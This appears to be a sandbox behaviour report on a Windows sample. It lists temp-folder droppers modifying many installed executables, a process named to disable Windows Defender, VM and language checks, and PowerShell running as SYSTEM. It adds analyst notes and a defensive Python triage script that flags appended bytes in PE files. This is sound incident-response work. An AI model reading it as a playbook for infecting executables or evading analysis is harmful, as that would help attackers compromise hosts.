| File opened for modification | C:\Program Files\Mozilla Firefox\private_browsing.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\pingsender.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ssvagent.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\idlj.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleApp.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WORDICON.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
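A responder handling the list above wants two things: the set of executables each dropper touched, and a cheap way to decide which of them to pull first for signature verification. The block below is an added example, not from the report or the sample. It collects touched .exe paths per process from rows in the report's format, and implements a section-table check that reports bytes appended past the last section and not accounted for by the Authenticode certificate table (signed binaries always carry that table in the overlay, so a naive "any overlay" check would flag every signed file under Program Files). Constructed minimal PE images stand in for the real files; the four sample rows are copied from the tables above, with the .xml row as a negative case. Caveat: some installers and packed binaries legitimately carry extra overlay, and an infector can instead add a section or patch the entry point, so a non-zero result is a triage filter, not a verdict; the authoritative check is Authenticode verification or a byte comparison against a known-good copy.

```python
import re
import struct

ROW_RE = re.compile(r'^\|\s*File opened for modification\s*\|\s*(?P<path>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|')

# Constructed input: rows copied from the report above; the .xml row (OfficeClickToRun
# touching its own rules file) is the negative case.
SAMPLE_ROWS = r"""
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
"""


def touched_executables(rows):
    """Map each writing process to the set of .exe paths it opened for modification."""
    out = {}
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m["path"].lower().endswith(".exe"):
            out.setdefault(m["proc"], set()).add(m["path"])
    return out


def build_pe(sections, cert=b"", overlay=b""):
    """Construct a minimal, non-runnable PE32 image: DOS header, COFF + optional header,
    one section header per (name, raw_size), raw data, an optional certificate table
    (registered in data directory 4) and optional trailing bytes. Test fixture only."""
    e_lfanew, opt_size, align = 0x40, 0xE0, 0x200
    n = len(sections)
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * n
    hdr_size = ((headers_len + align - 1) // align) * align      # round up to file alignment
    sec_hdrs, raw, ptr, va = b"", b"", hdr_size, 0x1000
    for name, size in sections:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, size, va, size, ptr, 0, 0, 0, 0, 0x60000020)
        raw += b"\x90" * size
        ptr += size
        va += max(size, 0x1000)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    if cert:
        struct.pack_into("<II", opt, 96 + 4 * 8, ptr, len(cert))  # Security directory: file offset, size
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    image = dos + b"PE\x00\x00" + coff + bytes(opt) + sec_hdrs
    return image + b"\x00" * (hdr_size - len(image)) + raw + cert + overlay


def pe_layout(data):
    """Return (end_of_last_section, cert_offset, cert_size). The Security directory
    (index 4) holds a raw file offset rather than an RVA, which is what makes this easy."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)              # PE32 vs PE32+
    cert_off, cert_size = struct.unpack_from("<II", data, dir_base + 4 * 8)
    table, end = opt + opt_size, 0
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end, cert_off, cert_size


def unexplained_overlay(data):
    """Bytes past the last section that are not the certificate table: 0 for a clean
    layout, >0 if something was appended (or the certificate table was displaced)."""
    end, cert_off, cert_size = pe_layout(data)
    if cert_size and cert_off >= end and cert_off + cert_size <= len(data):
        end = cert_off + cert_size
    return max(0, len(data) - end)


if __name__ == "__main__":
    for proc, paths in touched_executables(SAMPLE_ROWS).items():
        print(proc, "->", len(paths), "executable(s) to verify")
    secs = [(b".text", 0x400), (b".data", 0x200)]
    print("signed, clean:", unexplained_overlay(build_pe(secs, cert=b"\x01" * 0x100)))
    print("signed, appended:", unexplained_overlay(build_pe(secs, cert=b"\x01" * 0x100, overlay=b"\xCC" * 0x300)))
```

On a real host the same two functions run over the bytes of each path returned by touched_executables; a file whose unexplained overlay is non-zero, or whose certificate table no longer sits exactly at the end of the sections, goes to the front of the verification queue.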
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Note: the rows below show netsh.exe reading HKLM\SOFTWARE\Microsoft\NetSh, which every netsh invocation does to load its helpers; they are a side effect of the firewall changes recorded under Modifies Windows Firewall above, not a helper DLL being registered (that would appear as a value written under this key). On its own this signature is weak.
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
Checks SCSI registry key(s)
Note: everything here is attributed to wmiprvse.exe, the WMI provider host, so these are the server side of WMI storage queries whose client the table does not identify. The QEMU DVD-ROM identifier is the detail a VM check would key on; the same reading applies to the BIOS date and version reads under Checks BIOS information in registry above.
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
Note: mousocoreworker.exe (the Update Session Orchestrator worker) is a stock Windows component; its rows here and under Enumerates system info in registry below are background activity on the image, not sample behaviour.
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
Note: HKU\.DEFAULT is the registry profile of the SYSTEM account; powershell.EXE populating certificate-store keys there is a further sign that it runs as LocalSystem (see Drops file in System32 directory above). The OfficeClickToRun.exe telemetry value is background noise.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={56F93C62-742F-41DC-B6BD-FDD623ECFEA1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
